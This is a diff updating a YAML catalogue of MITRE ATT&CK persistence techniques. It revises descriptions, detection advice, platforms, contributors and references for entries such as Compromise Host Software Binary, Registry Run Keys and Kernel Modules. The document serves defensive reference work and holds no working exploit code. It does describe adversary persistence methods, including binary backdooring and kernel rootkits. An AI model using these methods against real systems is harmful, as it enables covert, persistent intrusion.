         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -31852,6 +32258,7 @@ persistence:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -31860,13 +32267,16 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -31892,10 +32302,18 @@ persistence:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -31904,10 +32322,20 @@ persistence:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -31924,14 +32352,11 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -32006,7 +32431,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -32095,24 +32519,27 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1554:
     technique:
-      modified: '2024-04-16T13:03:40.824Z'
+      modified: '2024-10-12T16:52:46.067Z'
       name: Compromise Host Software Binary
       description: |-
         Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
 
-        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
 
         An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+        After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
       - CrowdStrike Falcon OverWatch
+      - Liran Ravich, CardinalOps
+      - Jamie Williams (U ω U), PANW Unit 42
       x_mitre_deprecated: false
       x_mitre_detection: "Collect and analyze signing certificate metadata and check
         signature validity on software that executes within the environment. Look
@@ -32126,7 +32553,7 @@ persistence:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '2.0'
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Deletion'
       - 'File: File Modification'
@@ -32141,6 +32568,11 @@ persistence:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1554
         external_id: T1554
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Unit42 Banking Trojans Hooking 2022
         description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
           Financially Motivated Malware Became Infrastructure. Retrieved September
@@ -32154,11 +32586,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -32184,7 +32615,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -32198,7 +32628,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -32225,8 +32654,8 @@ persistence:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -32237,7 +32666,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1546.014:
@@ -32278,7 +32708,7 @@ persistence:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -32298,12 +32728,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -32357,11 +32786,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -32448,9 +32876,9 @@ persistence:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -32463,12 +32891,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1136.003:
     technique:
-      modified: '2024-03-28T16:14:28.678Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Create Account: Cloud Account'
       description: |-
         Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -32481,9 +32908,11 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Praetorian
       - Microsoft Threat Intelligence Center (MSTIC)
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Collect usage logs from cloud user and administrator accounts
         to identify unusual activity in the creation of new accounts and assignment
@@ -32492,13 +32921,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Creation'
       type: attack-pattern
@@ -32546,14 +32975,11 @@ persistence:
         url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.003
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -32589,16 +33015,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -32639,143 +33064,141 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests: []
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
